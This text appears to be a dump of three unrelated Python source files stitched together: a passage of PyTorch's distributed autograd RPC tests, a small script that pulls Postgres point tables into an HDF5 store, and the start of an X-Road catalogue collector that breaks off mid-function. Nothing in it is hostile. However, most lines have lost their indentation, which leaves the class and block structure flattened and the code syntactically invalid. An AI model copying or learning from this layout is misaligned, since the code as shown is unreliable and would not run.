with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.chain_matmul(t1, t2, t3, t4, t5)
@dist_init
def test_backward_complex_python_udf(self):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.chain_matmul(t1, t2, t3, t4)
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.chain_matmul(t1, t2, res)
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
store = dist.distributed_c10d._get_default_store()
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = self.get_shutdown_error_regex()
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
                # Mark rank 0 as done in the store, since the RPC framework on
                # some nodes might be broken at this point (listenLoop() in
                # ProcessGroupAgent might have exited).
store.set('test_backward_node_failure_python_udf_rank0_done', "True")
else:
# Wait for backward to finish on rank 0.
store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.chain_matmul(t1, t2, t3, t4, res)
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.chain_matmul(t1, t2, t3, t4, res).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call custom function in middle of backward pass to ensure all
# nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
            # Need at least one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
            # We should only have `num_current_backward_passes` and `num_autograd_contexts`.
self.assertTrue(len(debug_info) == 2)
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
            # check that a and b use different grad buffers
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@dist_init
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
                # Create a sparse tensor with non-contiguous indices and values
                # and return it as the grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for a.
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
# check a uses the same buffer
self.assertTrue(p_a == p_g)
# Run backwards multiple times.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
        # Non-contiguous indices and values; this should trigger a copy.
with dist_autograd.context() as context_id:
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = NonContGradFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
p_b = grads[b]._values().data_ptr()
            # check that a and b use different grad buffers
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to verify accumulation.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
static_grad_indices_ref = None
static_grad_values_ref = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
# indices() and values() return views, so holding onto
# references of them would not increment refcount of indices
# and values inside the sparse tensor.
MyFunc.static_grad_indices_ref = grad._indices()
MyFunc.static_grad_values_ref = grad._values()
return grad
a = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
self.assertIsNotNone(MyFunc.static_grad_indices_ref)
self.assertIsNotNone(MyFunc.static_grad_values_ref)
# grad would be stolen, since static_grad_indices_ref and
# static_grad_values_ref are holding onto views and don't bump the
# refcount.
self.assertTrue(p_g == p_a)
@dist_init
def test_post_hooks(self):
self.hook_called_times = 0
def post_hook_add_one(output_grads, input_grads):
self.hook_called_times += 1
return output_grads
def post_hook_add_two(output_grads, input_grads):
self.hook_called_times += 2
return output_grads
t = torch.rand(10, 10, requires_grad=True)
a = t + t
# Register post hooks
accumulate_grad_0 = a.grad_fn.next_functions[0][0]
accumulate_grad_0.register_hook(post_hook_add_one)
accumulate_grad_0.register_hook(post_hook_add_two)
accumulate_grad_1 = a.grad_fn.next_functions[1][0]
accumulate_grad_1.register_hook(post_hook_add_two)
with dist_autograd.context() as context_id:
loss = a.sum()
dist_autograd.backward(context_id, [loss])
self.assertEqual(5, self.hook_called_times)
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(1, len(grads))
self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
(t1 + t2).sum().backward()
with dist_autograd.context() as context_id:
t3 = t1 + t2
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t7.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
            # Root is on GPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t6.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
# Reusing a simplified helper function from DistAutogradTest to ensure
# autograd context is successfully cleaned up even when RPCs are failing.
def context_cleanup_test_helper(self, rpc_args, func):
initialize_pg(self.init_method, self.rank, self.world_size)
        # Test that in dist autograd, even when the tensors communicated over RPC do
        # NOT require grad, we still clean up the dist autograd contexts created
        # on other nodes. This is because the autograd context is still
        # communicated over RPC even if the tensor arguments do not require grad,
        # since the response might.
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_PROCESS_GROUP)
self.assertEqual(self.rpc_backend_options.num_send_recv_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
|
pull.py
|
#!/usr/bin/env python
'''Pull data from database to .h5 storage.'''
# Assuming our points tables have the following schema
# CREATE TABLE points (
# x INTEGER
# , y INTEGER
# , z INTEGER
# , value FLOAT
# );
# We have two databases: points_pre and points_post
import psycopg2
from psycopg2.extras import DictCursor
from pandas import DataFrame, HDFStore
from threading import Thread
def cursor(step):
'''Return a DictCursor connected to step=pre/post database.'''
conn = psycopg2.connect(database='points_{}'.format(step))
return conn.cursor(cursor_factory=DictCursor)
if __name__ == '__main__':
pre_cursor = cursor('pre')
post_cursor = cursor('post')
    sql = 'SELECT x, y, z, value FROM points'
# Get data in two threads to speed things up
pre_t = Thread(target=pre_cursor.execute, args=(sql,))
pre_t.start()
post_t = Thread(target=post_cursor.execute, args=(sql,))
post_t.start()
pre_t.join()
post_t.join()
# Create data frames
pre = DataFrame.from_records([dict(row) for row in pre_cursor])
post = DataFrame.from_records([dict(row) for row in post_cursor])
# Store data frame in HDF5 data store
store_file = 'points.h5'
store = HDFStore(store_file)
store['pre'] = pre
store['post'] = post
store.flush()
print('Data stored at {}'.format(store_file))
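    # Reading the stored frames back later is symmetric (illustrative sketch,
    # assuming the same pandas installation that provides HDFStore):
    #
    #     from pandas import read_hdf
    #     pre = read_hdf('points.h5', 'pre')
    #     post = read_hdf('points.h5', 'post')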
|
catalogue_collector.py
|
#!/usr/bin/env python3
"""This is a module for collection of X-Road services information."""
import queue
from threading import Thread, Event, Lock
from datetime import datetime, timedelta
from io import BytesIO
import argparse
import hashlib
import json
import logging.config
import os
import re
import shutil
import sys
import time
import urllib.parse as urlparse
import urllib3
from minio import Minio
from minio.error import NoSuchKey
import xrdinfo
# TODO: Refactor to use os.path.join instead of '{}{}' and '{}/{}' for path joining
# Use common path for files params['path'], params['minio_path'] -> params['cat_path']
# Default timeout for HTTP requests
DEFAULT_TIMEOUT = 5.0
# Do not use threading by default
DEFAULT_THREAD_COUNT = 1
DEFAULT_WSDL_REPLACES = [
# [Pattern, Replacement]
# Example:
# "Genereerimise aeg: 22.03.2019 08:00:30"
# [
# 'Genereerimise aeg: \\d{2}\\.\\d{2}\\.\\d{4} \\d{2}:\\d{2}:\\d{2}',
# 'Genereerimise aeg: DELETED'
# ]
]
# This logger will be used before loading of logger configuration
DEFAULT_LOGGER = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format': '%(asctime)s - %(threadName)s - %(levelname)s: %(message)s'
},
},
'handlers': {
'default': {
'level': 'WARNING',
'formatter': 'standard',
'class': 'logging.StreamHandler',
'stream': 'ext://sys.stderr',
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': 'WARNING',
'propagate': True
},
'catalogue-collector': {
'handlers': ['default'],
'level': 'WARNING',
'propagate': False
},
}
}
# Application will use this logger
LOGGER = logging.getLogger('catalogue-collector')
def identifier_path(items):
"""Convert identifier in form of list/tuple to string representation
of filesystem path. We assume that no symbols forbidden by
filesystem are used in identifiers.
"""
return '/'.join(items)
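# Usage sketch for identifier_path() (hypothetical identifier, not taken from a
# real X-Road instance):
#
#     >>> identifier_path(('INSTANCE', 'MEMBER_CLASS', 'MEMBER_CODE', 'SUBSYSTEM'))
#     'INSTANCE/MEMBER_CLASS/MEMBER_CODE/SUBSYSTEM'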
def load_config(config_file):
"""Load configuration from JSON file"""
try:
with open(config_file, 'r') as conf:
return json.load(conf)
except IOError as err:
LOGGER.error('Cannot load configuration file "%s": %s', config_file, str(err))
return None
except json.JSONDecodeError as err:
